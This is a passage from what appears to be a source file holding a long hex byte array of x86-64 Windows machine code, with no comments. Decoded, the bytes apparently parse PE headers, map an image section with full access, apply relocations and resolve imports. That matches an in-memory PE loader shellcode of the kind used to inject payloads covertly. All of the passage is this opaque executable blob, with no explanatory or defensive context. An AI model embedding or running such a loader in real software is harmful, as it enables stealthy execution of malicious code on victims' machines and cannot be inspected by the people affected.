929 0x24, 0x28, 0x48, 0x8d, 0x55, 0xc0, 0x48, 0x89, 0x54, 0x24, 0x20, 0x41,
930 0xb9, 0x00, 0x00, 0x00, 0x00, 0x41, 0xb8, 0x18, 0x01, 0x00, 0x00, 0x48,
931 0x89, 0xc2, 0x41, 0xff, 0xd2, 0x89, 0x85, 0xd4, 0x02, 0x00, 0x00, 0x48,
932 0x83, 0xbd, 0xd8, 0x02, 0x00, 0x00, 0x00, 0x74, 0x1a, 0x48, 0x8b, 0x85,
933 0x00, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x90, 0xf0, 0x00, 0x00, 0x00, 0x48,
934 0x8b, 0x85, 0xd8, 0x02, 0x00, 0x00, 0x48, 0x89, 0xc1, 0xff, 0xd2, 0x48,
935 0x8b, 0x85, 0x00, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x90, 0x10, 0x01, 0x00,
936 0x00, 0x48, 0x8b, 0x85, 0xc0, 0x02, 0x00, 0x00, 0x48, 0x89, 0xc1, 0xff,
937 0xd2, 0x48, 0x8b, 0x85, 0x00, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x90, 0x10,
938 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xc8, 0x02, 0x00, 0x00, 0x48, 0x89,
939 0xc1, 0xff, 0xd2, 0xb8, 0x01, 0x00, 0x00, 0x00, 0x48, 0x81, 0xc4, 0x68,
940 0x03, 0x00, 0x00, 0x5b, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83,
941 0xec, 0x30, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0x48, 0x8b,
942 0x45, 0x18, 0x48, 0x8b, 0x40, 0x30, 0x48, 0x85, 0xc0, 0x74, 0x2b, 0x48,
943 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x40, 0x30, 0x48, 0x8b, 0x00, 0x48, 0x8b,
944 0x50, 0x10, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x40, 0x30, 0x48, 0x89,
945 0xc1, 0xff, 0xd2, 0x89, 0x45, 0xfc, 0x48, 0x8b, 0x45, 0x18, 0x48, 0xc7,
946 0x40, 0x30, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b,
947 0x40, 0x38, 0x48, 0x85, 0xc0, 0x74, 0x2b, 0x48, 0x8b, 0x45, 0x18, 0x48,
948 0x8b, 0x40, 0x38, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x50, 0x10, 0x48, 0x8b,
949 0x45, 0x18, 0x48, 0x8b, 0x40, 0x38, 0x48, 0x89, 0xc1, 0xff, 0xd2, 0x89,
950 0x45, 0xfc, 0x48, 0x8b, 0x45, 0x18, 0x48, 0xc7, 0x40, 0x38, 0x00, 0x00,
951 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x40, 0x28, 0x48, 0x85,
952 0xc0, 0x74, 0x2b, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x40, 0x28, 0x48,
953 0x8b, 0x00, 0x48, 0x8b, 0x50, 0x10, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b,
954 0x40, 0x28, 0x48, 0x89, 0xc1, 0xff, 0xd2, 0x89, 0x45, 0xfc, 0x48, 0x8b,
955 0x45, 0x18, 0x48, 0xc7, 0x40, 0x28, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b,
956 0x45, 0x18, 0x48, 0x8b, 0x40, 0x10, 0x48, 0x85, 0xc0, 0x74, 0x75, 0x48,
957 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x40, 0x10, 0x48, 0x8b, 0x00, 0x4c, 0x8b,
958 0x80, 0xa0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x50,
959 0x20, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x40, 0x10, 0x48, 0x89, 0xc1,
960 0x41, 0xff, 0xd0, 0x89, 0x45, 0xfc, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b,
961 0x40, 0x10, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x50, 0x58, 0x48, 0x8b, 0x45,
962 0x18, 0x48, 0x8b, 0x40, 0x10, 0x48, 0x89, 0xc1, 0xff, 0xd2, 0x89, 0x45,
963 0xfc, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x40, 0x10, 0x48, 0x8b, 0x00,
964 0x48, 0x8b, 0x50, 0x10, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x40, 0x10,
965 0x48, 0x89, 0xc1, 0xff, 0xd2, 0x89, 0x45, 0xfc, 0x48, 0x8b, 0x45, 0x18,
966 0x48, 0xc7, 0x40, 0x10, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18,
967 0x48, 0x8b, 0x40, 0x20, 0x48, 0x85, 0xc0, 0x74, 0x2b, 0x48, 0x8b, 0x45,
968 0x18, 0x48, 0x8b, 0x40, 0x20, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x50, 0x10,
969 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x40, 0x20, 0x48, 0x89, 0xc1, 0xff,
970 0xd2, 0x89, 0x45, 0xfc, 0x48, 0x8b, 0x45, 0x18, 0x48, 0xc7, 0x40, 0x20,
971 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x40, 0x18,
972 0x48, 0x85, 0xc0, 0x74, 0x2b, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x40,
973 0x18, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x50, 0x10, 0x48, 0x8b, 0x45, 0x18,
974 0x48, 0x8b, 0x40, 0x18, 0x48, 0x89, 0xc1, 0xff, 0xd2, 0x89, 0x45, 0xfc,
975 0x48, 0x8b, 0x45, 0x18, 0x48, 0xc7, 0x40, 0x18, 0x00, 0x00, 0x00, 0x00,
976 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x40, 0x08, 0x48, 0x85, 0xc0, 0x74,
977 0x2b, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x40, 0x08, 0x48, 0x8b, 0x00,
978 0x48, 0x8b, 0x50, 0x10, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x40, 0x08,
979 0x48, 0x89, 0xc1, 0xff, 0xd2, 0x89, 0x45, 0xfc, 0x48, 0x8b, 0x45, 0x18,
980 0x48, 0xc7, 0x40, 0x08, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18,
981 0x48, 0x8b, 0x00, 0x48, 0x85, 0xc0, 0x74, 0x28, 0x48, 0x8b, 0x45, 0x18,
982 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x50, 0x10, 0x48, 0x8b,
983 0x45, 0x18, 0x48, 0x8b, 0x00, 0x48, 0x89, 0xc1, 0xff, 0xd2, 0x89, 0x45,
984 0xfc, 0x48, 0x8b, 0x45, 0x18, 0x48, 0xc7, 0x00, 0x00, 0x00, 0x00, 0x00,
985 0x90, 0x48, 0x83, 0xc4, 0x30, 0x5d, 0xc3, 0x55, 0x57, 0x56, 0x48, 0x81,
986 0xec, 0x70, 0x05, 0x00, 0x00, 0x48, 0x8d, 0xac, 0x24, 0x80, 0x00, 0x00,
987 0x00, 0x48, 0x89, 0x8d, 0x10, 0x05, 0x00, 0x00, 0x48, 0x89, 0x95, 0x18,
988 0x05, 0x00, 0x00, 0x48, 0xc7, 0x85, 0xb8, 0x03, 0x00, 0x00, 0x00, 0x00,
989 0x00, 0x00, 0x48, 0xc7, 0x85, 0xb0, 0x04, 0x00, 0x00, 0x00, 0x00, 0x00,
990 0x00, 0x48, 0xc7, 0x85, 0x98, 0x04, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
991 0x48, 0xc7, 0x45, 0x70, 0x00, 0x00, 0x00, 0x00, 0x48, 0xc7, 0x45, 0x68,
992 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x10, 0x05, 0x00, 0x00, 0x48,
993 0x8b, 0x80, 0xf8, 0x01, 0x00, 0x00, 0x48, 0x89, 0x85, 0x90, 0x04, 0x00,
994 0x00, 0x48, 0x8b, 0x85, 0x18, 0x05, 0x00, 0x00, 0x48, 0x05, 0x28, 0x05,
995 0x00, 0x00, 0x48, 0x89, 0x85, 0x88, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x85,
996 0x88, 0x04, 0x00, 0x00, 0x48, 0x89, 0x85, 0x80, 0x04, 0x00, 0x00, 0x48,
997 0x8b, 0x85, 0x80, 0x04, 0x00, 0x00, 0x8b, 0x40, 0x3c, 0x48, 0x63, 0xd0,
998 0x48, 0x8b, 0x85, 0x88, 0x04, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48, 0x89,
999 0x85, 0x78, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x10, 0x05, 0x00, 0x00,
1000 0x48, 0x8b, 0x40, 0x40, 0xb9, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x48,
1001 0x89, 0x85, 0x70, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x70, 0x04, 0x00,
1002 0x00, 0x48, 0x89, 0x85, 0x68, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x68,
1003 0x04, 0x00, 0x00, 0x8b, 0x40, 0x3c, 0x48, 0x63, 0xd0, 0x48, 0x8b, 0x85,
1004 0x70, 0x04, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, 0x60, 0x04,
1005 0x00, 0x00, 0x48, 0x8b, 0x85, 0x78, 0x04, 0x00, 0x00, 0x0f, 0xb7, 0x50,
1006 0x04, 0x48, 0x8b, 0x85, 0x60, 0x04, 0x00, 0x00, 0x0f, 0xb7, 0x40, 0x04,
1007 0x66, 0x39, 0xc2, 0x0f, 0x85, 0x84, 0x14, 0x00, 0x00, 0x48, 0x8b, 0x85,
1008 0x78, 0x04, 0x00, 0x00, 0x8b, 0x40, 0x50, 0x89, 0xc0, 0x48, 0x89, 0x45,
1009 0x78, 0x48, 0x8b, 0x85, 0x78, 0x04, 0x00, 0x00, 0x8b, 0x80, 0xb4, 0x00,
1010 0x00, 0x00, 0x89, 0x85, 0x5c, 0x04, 0x00, 0x00, 0x83, 0xbd, 0x5c, 0x04,
1011 0x00, 0x00, 0x00, 0x0f, 0x95, 0xc0, 0x0f, 0xb6, 0xc0, 0x89, 0x85, 0x58,
1012 0x04, 0x00, 0x00, 0x83, 0xbd, 0x58, 0x04, 0x00, 0x00, 0x00, 0x75, 0x0f,
1013 0x48, 0x8b, 0x85, 0x78, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x30, 0x48,
1014 0x89, 0x45, 0x70, 0x48, 0x8b, 0x85, 0x10, 0x05, 0x00, 0x00, 0x0f, 0xb6,
1015 0x80, 0xfb, 0x05, 0x00, 0x00, 0x84, 0xc0, 0x75, 0x5e, 0x48, 0x8d, 0x4d,
1016 0x78, 0x48, 0x8d, 0x85, 0x80, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x95, 0x90,
1017 0x04, 0x00, 0x00, 0x48, 0x89, 0x54, 0x24, 0x38, 0x48, 0xc7, 0x44, 0x24,
1018 0x30, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x28, 0x00, 0x00, 0x00,
1019 0x08, 0xc7, 0x44, 0x24, 0x20, 0x40, 0x00, 0x00, 0x00, 0x49, 0x89, 0xc9,
1020 0x41, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xba, 0x1f, 0x00, 0x0f, 0x00, 0x48,
1021 0x89, 0xc1, 0xe8, 0xca, 0x3b, 0x00, 0x00, 0x89, 0x85, 0x54, 0x04, 0x00,
1022 0x00, 0x83, 0xbd, 0x54, 0x04, 0x00, 0x00, 0x00, 0x0f, 0x89, 0x57, 0x01,
1023 0x00, 0x00, 0xe9, 0xf1, 0x13, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x10, 0x05,
1024 0x00, 0x00, 0x4c, 0x8b, 0x80, 0xb0, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85,
1025 0x10, 0x05, 0x00, 0x00, 0x48, 0x8d, 0x90, 0xfb, 0x05, 0x00, 0x00, 0x48,
1026 0x8d, 0x45, 0x10, 0x48, 0x89, 0xc1, 0x41, 0xff, 0xd0, 0xc7, 0x45, 0xe0,
1027 0x30, 0x00, 0x00, 0x00, 0x48, 0xc7, 0x45, 0xe8, 0x00, 0x00, 0x00, 0x00,
1028 0xc7, 0x45, 0xf8, 0x40, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x45, 0x10, 0x48,
1029 0x89, 0x45, 0xf0, 0x48, 0xc7, 0x45, 0x00, 0x00, 0x00, 0x00, 0x00, 0x48,
1030 0xc7, 0x45, 0x08, 0x00, 0x00, 0x00, 0x00, 0x4c, 0x8d, 0x45, 0x20, 0x48,
1031 0x8d, 0x4d, 0xe0, 0x48, 0x8d, 0x45, 0x38, 0x48, 0x8b, 0x95, 0x90, 0x04,
1032 0x00, 0x00, 0x48, 0x89, 0x54, 0x24, 0x58, 0xc7, 0x44, 0x24, 0x50, 0x00,
1033 0x00, 0x00, 0x00, 0x48, 0xc7, 0x44, 0x24, 0x48, 0x00, 0x00, 0x00, 0x00,
1034 0xc7, 0x44, 0x24, 0x40, 0x40, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x38,
1035 0x01, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x30, 0x01, 0x00, 0x00, 0x00,
1036 0xc7, 0x44, 0x24, 0x28, 0x80, 0x00, 0x00, 0x00, 0x48, 0xc7, 0x44, 0x24,
1037 0x20, 0x00, 0x00, 0x00, 0x00, 0x4d, 0x89, 0xc1, 0x49, 0x89, 0xc8, 0xba,
1038 0x00, 0x00, 0x00, 0x80, 0x48, 0x89, 0xc1, 0xe8, 0xa7, 0x3c, 0x00, 0x00,
1039 0x89, 0x85, 0x54, 0x04, 0x00, 0x00, 0x83, 0xbd, 0x54, 0x04, 0x00, 0x00,
1040 0x00, 0x0f, 0x88, 0xfd, 0x12, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x38, 0x48,
1041 0x83, 0xf8, 0xff, 0x0f, 0x84, 0xef, 0x12, 0x00, 0x00, 0x48, 0x8b, 0x45,
1042 0x38, 0x48, 0x85, 0xc0, 0x0f, 0x84, 0xe2, 0x12, 0x00, 0x00, 0x48, 0x8b,
1043 0x55, 0x38, 0x48, 0x8d, 0x85, 0x80, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x8d,
1044 0x90, 0x04, 0x00, 0x00, 0x48, 0x89, 0x4c, 0x24, 0x38, 0x48, 0x89, 0x54,
1045 0x24, 0x30, 0xc7, 0x44, 0x24, 0x28, 0x00, 0x00, 0x00, 0x01, 0xc7, 0x44,
1046 0x24, 0x20, 0x02, 0x00, 0x00, 0x00, 0x41, 0xb9, 0x00, 0x00, 0x00, 0x00,
1047 0x41, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xba, 0x1f, 0x00, 0x0f, 0x00, 0x48,
1048 0x89, 0xc1, 0xe8, 0x86, 0x3a, 0x00, 0x00, 0x89, 0x85, 0x54, 0x04, 0x00,
1049 0x00, 0x48, 0x8b, 0x45, 0x38, 0x48, 0x8b, 0x95, 0x90, 0x04, 0x00, 0x00,
1050 0x48, 0x89, 0xc1, 0xe8, 0x19, 0x3b, 0x00, 0x00, 0x83, 0xbd, 0x54, 0x04,
1051 0x00, 0x00, 0x00, 0x0f, 0x88, 0x7a, 0x12, 0x00, 0x00, 0x48, 0x8b, 0x85,
1052 0x80, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x4d, 0x70, 0x48, 0x8b, 0x95, 0x90,
1053 0x04, 0x00, 0x00, 0x48, 0x89, 0x54, 0x24, 0x50, 0xc7, 0x44, 0x24, 0x48,
1054 0x04, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x40, 0x00, 0x00, 0x00, 0x00,
1055 0xc7, 0x44, 0x24, 0x38, 0x02, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x55, 0x68,
1056 0x48, 0x89, 0x54, 0x24, 0x30, 0x48, 0xc7, 0x44, 0x24, 0x28, 0x00, 0x00,
1057 0x00, 0x00, 0x48, 0xc7, 0x44, 0x24, 0x20, 0x00, 0x00, 0x00, 0x00, 0x41,
1058 0xb9, 0x00, 0x00, 0x00, 0x00, 0x49, 0x89, 0xc8, 0x48, 0xc7, 0xc2, 0xff,
1059 0xff, 0xff, 0xff, 0x48, 0x89, 0xc1, 0xe8, 0x2a, 0x3a, 0x00, 0x00, 0x89,
1060 0x85, 0x54, 0x04, 0x00, 0x00, 0x83, 0xbd, 0x54, 0x04, 0x00, 0x00, 0x00,
1061 0x0f, 0x88, 0x08, 0x12, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x70, 0x48, 0x85,
1062 0xc0, 0x0f, 0x84, 0xfe, 0x11, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x10, 0x05,
1063 0x00, 0x00, 0x0f, 0xb6, 0x80, 0xfb, 0x05, 0x00, 0x00, 0x84, 0xc0, 0x74,
1064 0x5b, 0x48, 0x8b, 0x45, 0x70, 0x48, 0x89, 0x45, 0x60, 0x48, 0x8b, 0x45,
1065 0x68, 0x48, 0x89, 0x45, 0x58, 0x48, 0x8d, 0x4d, 0x58, 0x48, 0x8d, 0x45,
1066 0x60, 0x48, 0x8b, 0x95, 0x90, 0x04, 0x00, 0x00, 0x48, 0x89, 0x54, 0x24,
1067 0x28, 0x48, 0x8d, 0x95, 0x8c, 0x00, 0x00, 0x00, 0x48, 0x89, 0x54, 0x24,
1068 0x20, 0x41, 0xb9, 0x04, 0x00, 0x00, 0x00, 0x49, 0x89, 0xc8, 0x48, 0x89,
1069 0xc2, 0x48, 0xc7, 0xc1, 0xff, 0xff, 0xff, 0xff, 0xe8, 0x84, 0x3a, 0x00,
1070 0x00, 0x89, 0x85, 0x54, 0x04, 0x00, 0x00, 0x83, 0xbd, 0x54, 0x04, 0x00,
1071 0x00, 0x00, 0x0f, 0x88, 0x94, 0x11, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x78,
1072 0x04, 0x00, 0x00, 0x8b, 0x48, 0x54, 0x48, 0x8b, 0x45, 0x70, 0x48, 0x8b,
1073 0x95, 0x88, 0x04, 0x00, 0x00, 0x41, 0x89, 0xc8, 0x48, 0x89, 0xc1, 0xe8,
1074 0x90, 0x32, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x78, 0x04, 0x00, 0x00, 0x0f,
1075 0xb7, 0x40, 0x14, 0x0f, 0xb7, 0xd0, 0x48, 0x8b, 0x85, 0x78, 0x04, 0x00,
1076 0x00, 0x48, 0x01, 0xd0, 0x48, 0x83, 0xc0, 0x18, 0x48, 0x89, 0x85, 0x48,
1077 0x04, 0x00, 0x00, 0xc7, 0x85, 0xac, 0x04, 0x00, 0x00, 0x00, 0x00, 0x00,
1078 0x00, 0xe9, 0x91, 0x00, 0x00, 0x00, 0x8b, 0x95, 0xac, 0x04, 0x00, 0x00,
1079 0x48, 0x89, 0xd0, 0x48, 0xc1, 0xe0, 0x02, 0x48, 0x01, 0xd0, 0x48, 0xc1,
1080 0xe0, 0x03, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x85, 0x48, 0x04, 0x00, 0x00,
1081 0x48, 0x01, 0xd0, 0x44, 0x8b, 0x40, 0x10, 0x8b, 0x95, 0xac, 0x04, 0x00,
1082 0x00, 0x48, 0x89, 0xd0, 0x48, 0xc1, 0xe0, 0x02, 0x48, 0x01, 0xd0, 0x48,
1083 0xc1, 0xe0, 0x03, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x85, 0x48, 0x04, 0x00,
1084 0x00, 0x48, 0x01, 0xd0, 0x8b, 0x40, 0x14, 0x89, 0xc2, 0x48, 0x8b, 0x85,
1085 0x88, 0x04, 0x00, 0x00, 0x48, 0x01, 0xc2, 0x4c, 0x8b, 0x4d, 0x70, 0x8b,
1086 0x8d, 0xac, 0x04, 0x00, 0x00, 0x48, 0x89, 0xc8, 0x48, 0xc1, 0xe0, 0x02,
1087 0x48, 0x01, 0xc8, 0x48, 0xc1, 0xe0, 0x03, 0x48, 0x89, 0xc1, 0x48, 0x8b,
1088 0x85, 0x48, 0x04, 0x00, 0x00, 0x48, 0x01, 0xc8, 0x8b, 0x40, 0x0c, 0x89,
1089 0xc0, 0x4c, 0x01, 0xc8, 0x48, 0x89, 0xc1, 0xe8, 0xd4, 0x31, 0x00, 0x00,
1090 0x83, 0x85, 0xac, 0x04, 0x00, 0x00, 0x01, 0x48, 0x8b, 0x85, 0x78, 0x04,
1091 0x00, 0x00, 0x0f, 0xb7, 0x40, 0x06, 0x0f, 0xb7, 0xc0, 0x39, 0x85, 0xac,
1092 0x04, 0x00, 0x00, 0x0f, 0x82, 0x55, 0xff, 0xff, 0xff, 0x48, 0x8b, 0x55,
1093 0x70, 0x48, 0x8b, 0x85, 0x78, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x30,
1094 0x48, 0xf7, 0xd8, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, 0x40, 0x04, 0x00,
1095 0x00, 0x83, 0xbd, 0x58, 0x04, 0x00, 0x00, 0x00, 0x0f, 0x84, 0x06, 0x02,
1096 0x00, 0x00, 0x48, 0x83, 0xbd, 0x40, 0x04, 0x00, 0x00, 0x00, 0x0f, 0x84,
1097 0xf8, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x78, 0x04, 0x00, 0x00, 0x8b,
1098 0x80, 0xb0, 0x00, 0x00, 0x00, 0x89, 0x85, 0x3c, 0x04, 0x00, 0x00, 0x8b,
1099 0x95, 0x3c, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x70, 0x48, 0x01, 0xd0,
1100 0x48, 0x89, 0x85, 0xb8, 0x04, 0x00, 0x00, 0xe9, 0x9b, 0x01, 0x00, 0x00,
1101 0x48, 0x8b, 0x85, 0xb8, 0x04, 0x00, 0x00, 0x48, 0x83, 0xc0, 0x08, 0x48,
1102 0x89, 0x85, 0xc0, 0x04, 0x00, 0x00, 0xe9, 0x53, 0x01, 0x00, 0x00, 0x48,
1103 0x8b, 0x85, 0xb8, 0x04, 0x00, 0x00, 0x8b, 0x10, 0x48, 0x8b, 0x85, 0xc0,
1104 0x04, 0x00, 0x00, 0x0f, 0xb7, 0x00, 0x66, 0x25, 0xff, 0x0f, 0x0f, 0xb7,
1105 0xc0, 0x01, 0xc2, 0x48, 0x8b, 0x85, 0x78, 0x04, 0x00, 0x00, 0x8b, 0x40,
1106 0x50, 0x39, 0xc2, 0x0f, 0x83, 0x1d, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x55,
1107 0x70, 0x48, 0x8b, 0x85, 0xb8, 0x04, 0x00, 0x00, 0x8b, 0x00, 0x89, 0xc1,
1108 0x48, 0x8b, 0x85, 0xc0, 0x04, 0x00, 0x00, 0x0f, 0xb7, 0x00, 0x66, 0x25,
1109 0xff, 0x0f, 0x0f, 0xb7, 0xc0, 0x48, 0x01, 0xc8, 0x48, 0x01, 0xd0, 0x48,
1110 0x89, 0x85, 0x30, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xc0, 0x04, 0x00,
1111 0x00, 0x0f, 0xb6, 0x40, 0x01, 0x83, 0xe0, 0xf0, 0x3c, 0xa0, 0x75, 0x23,
1112 0x48, 0x8b, 0x85, 0x30, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x10, 0x48, 0x8b,
1113 0x85, 0x40, 0x04, 0x00, 0x00, 0x48, 0x01, 0xc2, 0x48, 0x8b, 0x85, 0x30,
1114 0x04, 0x00, 0x00, 0x48, 0x89, 0x10, 0xe9, 0xbb, 0x00, 0x00, 0x00, 0x48,
1115 0x8b, 0x85, 0xc0, 0x04, 0x00, 0x00, 0x0f, 0xb6, 0x40, 0x01, 0x83, 0xe0,
1116 0xf0, 0x3c, 0x30, 0x75, 0x25, 0x48, 0x8b, 0x85, 0x30, 0x04, 0x00, 0x00,
1117 0x48, 0x8b, 0x10, 0x48, 0x8b, 0x85, 0x40, 0x04, 0x00, 0x00, 0x89, 0xc0,
1118 0x48, 0x01, 0xc2, 0x48, 0x8b, 0x85, 0x30, 0x04, 0x00, 0x00, 0x48, 0x89,
1119 0x10, 0xe9, 0x84, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xc0, 0x04, 0x00,
1120 0x00, 0x0f, 0xb6, 0x40, 0x01, 0x83, 0xe0, 0xf0, 0x3c, 0x10, 0x75, 0x27,
1121 0x48, 0x8b, 0x85, 0x30, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x10, 0x48, 0x8b,
1122 0x85, 0x40, 0x04, 0x00, 0x00, 0x48, 0xc1, 0xe8, 0x10, 0x0f, 0xb7, 0xc0,
1123 0x48, 0x01, 0xc2, 0x48, 0x8b, 0x85, 0x30, 0x04, 0x00, 0x00, 0x48, 0x89,
1124 0x10, 0xeb, 0x4b, 0x48, 0x8b, 0x85, 0xc0, 0x04, 0x00, 0x00, 0x0f, 0xb6,
1125 0x40, 0x01, 0x83, 0xe0, 0xf0, 0x3c, 0x20, 0x75, 0x23, 0x48, 0x8b, 0x85,
1126 0x30, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x10, 0x48, 0x8b, 0x85, 0x40, 0x04,
1127 0x00, 0x00, 0x0f, 0xb7, 0xc0, 0x48, 0x01, 0xc2, 0x48, 0x8b, 0x85, 0x30,
1128 0x04, 0x00, 0x00, 0x48, 0x89, 0x10, 0xeb, 0x16, 0x48, 0x8b, 0x85, 0xc0,
1129 0x04, 0x00, 0x00, 0x0f, 0xb6, 0x40, 0x01, 0x83, 0xe0, 0xf0, 0x84, 0xc0,
1130 0x0f, 0x85, 0x28, 0x0e, 0x00, 0x00, 0x48, 0x83, 0x85, 0xc0, 0x04, 0x00,
1131 0x00, 0x02, 0x48, 0x8b, 0x85, 0xb8, 0x04, 0x00, 0x00, 0x8b, 0x40, 0x04,
1132 0x89, 0xc2, 0x48, 0x8b, 0x85, 0xb8, 0x04, 0x00, 0x00, 0x48, 0x01, 0xd0,
1133 0x48, 0x39, 0x85, 0xc0, 0x04, 0x00, 0x00, 0x0f, 0x85, 0x8a, 0xfe, 0xff,
1134 0xff, 0x48, 0x8b, 0x85, 0xc0, 0x04, 0x00, 0x00, 0x48, 0x89, 0x85, 0xb8,
1135 0x04, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x70, 0x8b, 0x8d, 0x3c, 0x04, 0x00,
1136 0x00, 0x8b, 0x95, 0x5c, 0x04, 0x00, 0x00, 0x48, 0x01, 0xca, 0x48, 0x01,
1137 0xd0, 0x48, 0x39, 0x85, 0xb8, 0x04, 0x00, 0x00, 0x73, 0x12, 0x48, 0x8b,
1138 0x85, 0xb8, 0x04, 0x00, 0x00, 0x8b, 0x40, 0x04, 0x85, 0xc0, 0x0f, 0x85,
1139 0x34, 0xfe, 0xff, 0xff, 0x48, 0x8b, 0x85, 0x78, 0x04, 0x00, 0x00, 0x8b,
1140 0x80, 0x90, 0x00, 0x00, 0x00, 0x89, 0x85, 0x3c, 0x04, 0x00, 0x00, 0x83,
1141 0xbd, 0x3c, 0x04, 0x00, 0x00, 0x00, 0x0f, 0x84, 0xaa, 0x01, 0x00, 0x00,
1142 0x8b, 0x95, 0x3c, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x70, 0x48, 0x01,
1143 0xd0, 0x48, 0x89, 0x85, 0xd8, 0x04, 0x00, 0x00, 0xe9, 0x7f, 0x01, 0x00,
1144 0x00, 0x48, 0x8b, 0x85, 0xd8, 0x04, 0x00, 0x00, 0x8b, 0x40, 0x0c, 0x89,
1145 0xc2, 0x48, 0x8b, 0x45, 0x70, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, 0x28,
1146 0x04, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x28, 0x04, 0x00, 0x00, 0x48, 0x89,
1147 0xc2, 0x48, 0x8b, 0x8d, 0x10, 0x05, 0x00, 0x00, 0xe8, 0xe1, 0xd9, 0xff,
1148 0xff, 0x48, 0x89, 0x85, 0x20, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xd8,
1149 0x04, 0x00, 0x00, 0x8b, 0x00, 0x89, 0xc2, 0x48, 0x8b, 0x45, 0x70, 0x48,
1150 0x01, 0xd0, 0x48, 0x89, 0x85, 0xe8, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x85,
1151 0xd8, 0x04, 0x00, 0x00, 0x8b, 0x40, 0x10, 0x89, 0xc2, 0x48, 0x8b, 0x45,
1152 0x70, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, 0xe0, 0x04, 0x00, 0x00, 0x48,
1153 0x8b, 0x85, 0xe8, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x85, 0xc0,
1154 0x0f, 0x84, 0xf9, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xe8, 0x04, 0x00,
1155 0x00, 0x48, 0x8b, 0x00, 0x48, 0x85, 0xc0, 0x79, 0x3d, 0x48, 0x8b, 0x85,
1156 0xe8, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x89, 0xc2, 0x48, 0x8b, 0x85,
